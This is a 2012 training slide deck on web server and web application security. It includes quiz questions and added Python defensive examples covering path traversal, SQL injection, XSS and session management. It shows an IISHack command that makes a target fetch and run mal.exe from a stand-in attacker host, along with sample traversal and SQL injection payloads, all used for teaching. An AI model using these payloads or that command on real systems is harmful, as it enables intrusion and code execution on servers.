© 2012 nCircle. All rights reserved.
Get Your Black Belt in Web Application Security
26 April 2012
Web Server and Web Applications Security
Why Web Servers and Web Applications are Hard to Defend
Why is attacking a web server or web application one of the easiest attack methods?
– On the perimeter
– Accessible by anyone on the Internet
– Need to balance functionality with security
– Port 80 and port 443 (can't just block them)
– Lack of security awareness of many web developers
– High level of traffic: hard to distinguish an attack from high volumes of legitimate traffic
Typical Attack Steps against a Web Server
1. Reconnaissance (passive)
2. Scanning and enumeration (active)
3. Gaining Access (exploit)
4. Escalation of privilege
5. Maintain access
6. Covering tracks and placing backdoors
Two Methods of Attack: The Web Server and Web Applications
• Web Server Attacks
– Vulnerabilities in the web server or web server configuration
• Examples: Buffer Overflows, Traversals
• Web Application Attacks
– Vulnerabilities in web applications
• Command Injection
• XSS (Cross Site Scripting)
Ichi (one)
With respect to defending against web attacks, what is the problem with port 80?
a. It is the default TFTP port
b. It can be closed
c. It is not a well-known port
d. It can’t be blocked
Difficulty: Easy/Medium
Ni (two)
For an attack to work on a web server or a web application what does it need to have?
a. An exploit
b. A risk
c. A vulnerability
d. A configuration
Difficulty: Easy/Medium
Congratulations on your new Yellow Belt! You have attained the WebApp rank of 7th Kyu.
Web Server Attacks
Buffer Overflow Attack
A buffer overflow attack writes more data into a fixed-size buffer than it can hold, overwriting adjacent memory that controls the program's execution path (for example a saved return address). The attacker uses this to redirect execution into code of their choosing.
Cause: Poor boundary checking (failing to check that the input fits within the bounds of the buffer before writing it)
Example:
IISHack.exe exploits a buffer overflow in the IIS HTTP daemon. It is given the target host and port and the URL of a payload for the server to fetch and run. Below is a sample:
c:\> iishack www.WebserverA.com 80 www.hackserver.com/mal.exe
Web Server File System Traversal Attacks
• Clients are permitted access only to a specific subtree of the server file system, known as the web document root directory.
• By modifying a website URL, an attacker can perform a file system traversal and read files on other parts of the server.
• The attack is initiated by inserting special characters in URLs, for example the ../ sequence (or ..\ on Windows servers).
• Encoding can be used to bypass web server filtering: a filter that looks only for the literal ../ misses %2e%2e%2f, and a filter that decodes once misses double-encoded forms such as %252e%252e%252f.
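Added example (not from the original slides): a Python resolver that maps a request path under the document root and rejects anything that escapes it, shown next to the kind of naive filter that encoding defeats. The document root /var/www/html and the request paths are constructed for illustration; the function names are the example's own.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Document root for the example; the path is constructed, not taken from the slides.
DOCROOT = "/var/www/html"


def naive_filter_blocks(url_path: str) -> bool:
    """The kind of check that encoding defeats: it looks for the literal '../'
    in the raw, still-encoded URL, so '..%2f' and '%2e%2e/' are never seen."""
    return "../" in url_path


def resolve_request_path(docroot: str, url_path: str) -> Optional[str]:
    """Map a request path onto the filesystem and refuse anything outside docroot.

    1. Percent-decode until the string stops changing (bounded), so double
       encoding ('%252e%252e%252f' -> '%2e%2e%2f' -> '../') is fully undone.
    2. Treat backslashes as separators, since IIS-style traversal uses '..\\'.
    3. Reject NUL bytes, which truncate paths in C-based servers.
    4. Normalize lexically (no filesystem access) and anchor under docroot.
    5. Accept only if the final path is docroot itself or lies below it.
    Returns the resolved absolute path, or None if the request escapes docroot.
    """
    decoded = url_path
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = decoded.replace("\\", "/")
    if "\x00" in decoded:
        return None
    full = posixpath.normpath(posixpath.join(docroot, decoded.lstrip("/")))
    if full != docroot and not full.startswith(docroot + "/"):
        return None
    return full


if __name__ == "__main__":
    # Constructed request paths: two legitimate, the rest traversal attempts.
    for req in ["/index.html", "/images/../index.html", "/../../etc/passwd",
                "/..%2f..%2f..%2fetc/passwd",
                "/%252e%252e/%252e%252e/%252e%252e/etc/passwd",
                "/..\\..\\windows\\win.ini"]:
        print(f"{req:48} naive_blocks={naive_filter_blocks(req)!s:5} "
              f"resolved={resolve_request_path(DOCROOT, req)}")
```

The point of the comparison: the naive filter blocks only the plain ../ form, while the resolver decides on the canonical path after decoding, so every encoded variant lands on the same check. Decoding in a bounded loop, rather than exactly once, is what closes the double-encoding bypass.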
San (three)
Which one of the following is NOT one of the typical attacks used against a web server like Apache?
a. ARP poisoning
b. Buffer overflow
c. Source disclosure
d. File system traversal
Difficulty: Easy/Medium
Shi (four)
A web server attack that involves a hacker gaining access to restricted areas and files on a web server is known as which type of attack?
a. Buffer boundary
b. File system traversal
c. Encryption
d. File overflow
Difficulty: Easy/Medium
Congratulations on your new Blue Belt! You have attained the WebApp rank of 4th Kyu.
Web Application Attacks
OWASP Top 10 Categories
A1-Injection
A2-Cross Site Scripting (XSS)
A3-Broken Authentication/Session Management
A4-Insecure Direct Object References
A5-Cross Site Request Forgery (CSRF)
A6-Security Misconfiguration
A7-Insecure Cryptographic Storage
A8-Failure to Restrict URL Access
A9-Insufficient Transport Layer Protection
A10-Unvalidated Redirects and Forwards
OWASP Top 10 (2010 List) – www.owasp.org
Injection (Command Injection – OWASP A1)
• Occurs when untrusted data is sent to an interpreter as part of a command or query.
• Cleverly formed data can trick the interpreter into performing unintended commands or revealing unintended information.
• Examples of command injection:
– SQL Injection
– Script Injection
• Any web application that accepts input is potentially vulnerable to injection attacks. Injection is usually done by changing the data in the parameters that are passed into a program.
SQL Injection (Valid Data)
As an example, the user enters Jill and Brown into two input fields on a web page.
The program joins this input into the CustID variable and dynamically creates the query string:
SELECT * FROM accounts WHERE customerID = 'Jill_Brown'
The program then sends this SQL query to the database, which retrieves and displays Jill Brown's record as expected.
SQL Injection (Invalid Data)
The user enters Jane and Doe' OR '1'='1 on the web page.
The program takes this input and dynamically creates the query string:
SELECT * FROM accounts WHERE customerID = 'Jane_Doe' OR '1'='1'
The program sends this SQL query to the database, which retrieves ALL of the records in the accounts table: NOT as expected. The attacker's quote character closed the string literal, so everything after it was parsed as SQL rather than as data.
Defenses Against SQL Injection
• Prepared statements (parameterized queries)
• Stored procedures (only if they avoid building dynamic SQL themselves)
• Escaping all user-supplied input (a last resort: database-specific and easy to get wrong)
• Least privilege for the database account the application uses
• White-list input validation
Reference: OWASP SQL Injection Prevention Cheat Sheet (www.owasp.org)
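Added example, not from the slides: the two preceding slides' queries run against an in-memory SQLite table, first built by string concatenation (the vulnerable form) and then as a parameterized query, plus a white-list check for the name fields. The accounts table, its rows and the function names are constructed for the example.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the slides' accounts table (rows are invented)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (customerID TEXT PRIMARY KEY, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("Jill_Brown", 100), ("Jane_Doe", 250), ("Bob_Smith", 75)])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, first: str, last: str) -> List[Tuple]:
    """Builds the query by string concatenation, as the slides describe.
    With last = "Doe' OR '1'='1" the WHERE clause becomes
    customerID = 'Jane_Doe' OR '1'='1', which is true for every row."""
    cust_id = f"{first}_{last}"
    query = f"SELECT customerID, balance FROM accounts WHERE customerID = '{cust_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, first: str, last: str) -> List[Tuple]:
    """Prepared statement: the driver binds cust_id as a value, so the quote
    and the OR clause are just characters compared against customerID."""
    cust_id = f"{first}_{last}"
    return conn.execute("SELECT customerID, balance FROM accounts WHERE customerID = ?",
                        (cust_id,)).fetchall()


NAME_CHARS = frozenset("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-'")


def is_valid_name_part(s: str) -> bool:
    """White-list validation for a name field: letters, hyphen and apostrophe,
    1-40 characters. It rejects the slide's payload (space and '=' are not
    allowed) but must still accept O'Brien, so it complements the
    parameterized query rather than replacing it."""
    return 0 < len(s) <= 40 and all(c in NAME_CHARS for c in s)


if __name__ == "__main__":
    db = make_db()
    print("valid, concatenated: ", lookup_vulnerable(db, "Jill", "Brown"))
    print("injected, concatenated:", lookup_vulnerable(db, "Jane", "Doe' OR '1'='1"))
    print("injected, bound:     ", lookup_parameterized(db, "Jane", "Doe' OR '1'='1"))
    print("whitelist O'Brien:   ", is_valid_name_part("O'Brien"))
    print("whitelist payload:   ", is_valid_name_part("Doe' OR '1'='1"))
```

The least-privilege item from the list is not something an in-memory SQLite database can show: in a real deployment the account behind `conn` would hold SELECT on the tables the page needs and nothing more, so that even a successful injection cannot reach other tables or write.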
Cross Site Scripting (XSS – OWASP A2)
• Cross-Site Scripting attacks are a type of injection attack in which malicious scripts are injected into otherwise benign and trusted web sites. The injection usually happens when untrusted data supplied in a web page request (or stored from an earlier one) is written into the page without escaping, so the victim's browser runs the script with the trust it gives that site.
Defenses Against XSS
Primary defense: escaping untrusted data
"Escaping" is a technique used to ensure that characters are treated as data, not as characters that are significant to the interpreter's parser.
Rule #0: Never put untrusted data in a web page except in allowed locations
Rule #1: HTML-escape before inserting untrusted data into HTML element content
Rules #2 - #7: Context-specific escaping for the other allowed locations (HTML attribute values, JavaScript data values, CSS property values, URL parameters), sanitizing any HTML markup you must accept with a dedicated library, and preventing DOM-based XSS
Reference: OWASP XSS Prevention Cheat Sheet (www.owasp.org)
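Added example, not from the slides or the cheat sheet's own code: Python escapers for three of the contexts the rules above name (element content, attribute value, quoted JavaScript string), applied to one constructed payload, with the unescaped rendering beside them. Each context needs its own escaper because the browser parses them differently; for instance, the HTML parser does not decode entities inside a script block, so HTML entity escaping is the wrong tool there. The payload and function names are the example's own.

```python
import html

# Constructed payload for the example.
PAYLOAD = "<script>alert(1)</script>"


def escape_html_content(s: str) -> str:
    """Rule #1 (HTML element content): entity-escape & < > " and ' so the
    HTML parser treats the value as text, not as tags or attributes."""
    return html.escape(s, quote=True)


def escape_html_attribute(s: str) -> str:
    """Rule #2 (HTML attribute values): escape everything except ASCII
    alphanumerics as &#xHH;. That closes every way of ending the attribute,
    quoted or not, including the space and '=' that unquoted attributes allow."""
    return "".join(c if (c.isalnum() and ord(c) < 128) else f"&#x{ord(c):X};" for c in s)


def escape_js_string(s: str) -> str:
    """Rule #3 (inside a quoted JavaScript string literal): \\xHH-escape all
    non-alphanumerics (\\uXXXX above Latin-1). Quotes cannot end the string,
    and '</script>' cannot end the script block, because '<' and '/' are
    emitted as escapes the HTML parser never sees as markup."""
    out = []
    for c in s:
        if c.isalnum() and ord(c) < 128:
            out.append(c)
        elif ord(c) < 256:
            out.append(f"\\x{ord(c):02X}")
        else:
            out.append(f"\\u{ord(c):04X}")
    return "".join(out)


def render_vulnerable(name: str) -> str:
    """The 'before': untrusted data dropped straight into element content."""
    return f"<p>Hello, {name}</p>"


def render_hardened(name: str) -> str:
    """The same untrusted value placed in three contexts, each with its own escaper."""
    return (f"<p>Hello, {escape_html_content(name)}</p>\n"
            f'<input value="{escape_html_attribute(name)}">\n'
            f"<script>var user = '{escape_js_string(name)}';</script>")


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))
    print(render_hardened(PAYLOAD))
```

In practice the template engine should apply the right escaper automatically for each context; the hand-written functions here exist to make visible what that engine has to do.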
Broken Authentication and Session Management (OWASP A3)
• Web application functions related to authentication and/or session management (passwords, keys, cookies, tokens, session IDs) are poorly implemented, allowing an attacker to assume someone else's identity.
Defenses Against Broken Authentication and Session Management
• Secure management of session identifiers
– Generate session IDs from a cryptographically secure random source
– Do not put session identifiers in the URL
– Sessions should time out (idle and absolute)
• Do not allow the login process to execute from an unencrypted page
• Password Change Controls
• Password use / strength / storage
• Reference: OWASP Session Management and Authentication Cheat Sheets (www.owasp.org)
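Added example, not from the slides: a minimal server-side session store in Python that applies the session-identifier rules above (random IDs, idle and absolute timeouts, IDs never in the URL) together with the cookie attributes a practitioner would set. The timeout values, cookie name and function names are assumptions for the example; the ID rotation on login follows the referenced OWASP Session Management Cheat Sheet and is not on the slide.

```python
import secrets
import time
from typing import Optional
from urllib.parse import parse_qs, urlparse

# Timeout policy values are assumptions for the example, not from the slides.
IDLE_TIMEOUT = 15 * 60        # seconds without a request before the session dies
ABSOLUTE_TIMEOUT = 8 * 3600   # hard cap on a session's life regardless of activity


def new_session_id() -> str:
    """128 bits from the OS CSPRNG (never a counter, timestamp or user hash)."""
    return secrets.token_urlsafe(16)


def session_cookie_header(sid: str, secure: bool = True) -> str:
    """Set-Cookie value for the ID: HttpOnly keeps page script from reading it,
    Secure keeps it off plaintext HTTP, SameSite limits cross-site sending."""
    flags = "; Path=/; HttpOnly; SameSite=Lax"
    if secure:
        flags += "; Secure"
    return f"SESSIONID={sid}{flags}"


class SessionStore:
    """Server-side session table with idle and absolute expiry.
    `now` is injectable so expiry can be exercised without waiting."""

    def __init__(self, now=time.time):
        self._now = now
        self._sessions = {}  # sid -> {"user", "created", "last_seen"}

    def create(self, user: str) -> str:
        sid = new_session_id()
        t = self._now()
        self._sessions[sid] = {"user": user, "created": t, "last_seen": t}
        return sid

    def get_user(self, sid: str) -> Optional[str]:
        s = self._sessions.get(sid)
        if s is None:
            return None
        t = self._now()
        if t - s["last_seen"] > IDLE_TIMEOUT or t - s["created"] > ABSOLUTE_TIMEOUT:
            del self._sessions[sid]
            return None
        s["last_seen"] = t
        return s["user"]

    def rotate(self, sid: str) -> Optional[str]:
        """Issue a fresh ID on login or privilege change, so an ID an attacker
        planted or observed beforehand (session fixation) stops being valid."""
        s = self._sessions.pop(sid, None)
        if s is None:
            return None
        new_sid = new_session_id()
        self._sessions[new_sid] = s
        return new_sid

    def destroy(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def sid_in_url(url: str) -> bool:
    """Flags the anti-pattern the slide warns about: a session ID carried in
    the URL (query parameter or ;jsessionid= path parameter), where it ends
    up in server logs, browser history and Referer headers."""
    lowered = url.lower()
    if ";jsessionid=" in lowered:
        return True
    query = parse_qs(urlparse(url).query)
    return any(k.lower() in ("sessionid", "jsessionid", "phpsessid", "sid") for k in query)
```

The `Secure` flag is what enforces the slide's "no login from an unencrypted page" rule on the cookie side: a session cookie marked Secure is never sent over plain HTTP, so a downgraded page cannot leak it.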
Go (five)
A web application attack that focuses on the database behind a web application and enables a hacker to acquire sensitive information stored in the database is which one of the following?
a. Sequence infiltration
b. SQL injection
c. Cookie poisoning
d. Hidden parameter exploit
Difficulty: Easy/Medium
Roku (six)
What is one of the defenses against SQL Injection?
a. Least Privilege
b. Black list input validation
c. Sanitization
d. Proxy manipulation
Difficulty: Easy/Medium
Congratulations on your new advanced Blue Belt rank! You have attained the WebApp rank of 2nd Kyu.
Web Server and Web Application Defense Tools
Web Server and Application Defense Tools (1 of 2)
• Scanning and mapping tools
– Ping, Nping, Nmap, Amap, SuperScan, …
• Vulnerability and web vulnerability scanners
– Nikto, Wikto, Nessus, w3af, IP360, WebInspect, Sentinel, WebApp360, Cenzic, Fortify, …
• Web proxy tools
– WebScarab, Paros Proxy, Burp Proxy, …
• Web mapping/ripping tools
– Black Widow, Wget, skipfish, …
• Communication/data transfer tools
– Ncat, telnet, ftp, …
• Exploits, exploit kits, and exploit frameworks
– Program for a specific exploit
– Pen test frameworks: Metasploit, Core Impact, CANVAS
Web Server and Application Defense Tools (2 of 2)
• Password cracking tools
– John the Ripper, Cain and Abel, PRTK, ophcrack, …
• Web source code examination tools
– Instant Source, Firebug, …
• SQL injection tools
– BSQL Hacker, The Mole, sqlmap, Pangolin, …
Network Defense Tools (Protecting the Web Server)
• Routers
• Firewalls (network layer)
• Web Application Firewalls (application layer)
• Web Application Proxies
• Honeypots/Honeynets
• Logging
• Intrusion Detection/Prevention Systems (IDS/IPS)
• Host-based Intrusion Detection (HIDS), e.g. file integrity detection
• Backups
• Computer Forensic Tools
Web Server Protection
• Protect the Web Server
• Vulnerability Assessment
• Harden the Web Server
– Host (OS)
– Web Server
– Web Services
• Logging
• Backups and recovery
Place the Web Server in an Untrusted Zone
Security Harden the Web Server (1 of 2)
• Use Security Hardening Guides (vendor documentation, OWASP, SANS, NIST, WASC)
• Host (OS) hardening
• Web Server hardening
– Use tools like IIS Lockdown and URLscan
– Harden each service you offer on your Web Server
– Disable / remove anything you don't use or need: accounts, ports, services, plug-ins
– Configuration settings
– Permissions
Security Harden the Web Server (2 of 2)
• Authentication and Access Control
– File and directory permissions
– Account password and lockout policies
• Logging and Audit Policies
• Vulnerability and Compliance Assessments
– Vulnerability scanner
– Web application vulnerability scanner
– Configuration scanner
– Audits for compliance assessments
– Penetration testing / manual testing
Web Server Attack Countermeasures
• Buffer Overflow
– Conduct frequent scans for server vulnerabilities
– Promptly acquire and install patches and service packs
– Implement effective firewalls
– Apply web configuration lockdown utilities
• File System Traversal
– Promptly apply patches and updates to the web server
– Restrict privileges to executable programs such as cmd.exe
– Set file and directory permissions
– Locate the system software on a different disk drive from the web site software and content directory (a ../ traversal cannot cross drive letters)
Shichi (seven)
Tools such as Nmap and Amap are used primarily for which one of the following Web attack steps?
a. Banner grabbing
b. Defeating authentication
c. Scanning
d. Password Cracking
Difficulty: Medium/Hard
Hachi (eight)
What is a good tool to help harden an IIS web server? (choose the best answer)
a. Cain and Abel
b. URLscan
c. ncat
d. WebScarab
Difficulty: Medium/Hard
Congratulations on your new Black Belt! You have attained the WebApp rank of 1st Dan
Resources
• OWASP (Open Web Application Security Project) www.owasp.org
• NIST (National Institute of Standards and Technology) www.nist.gov
• SANS www.sans.org
• Web Application Security Consortium (WASC) www.webappsec.org
• SecTools.org http://sectools.org
Questions?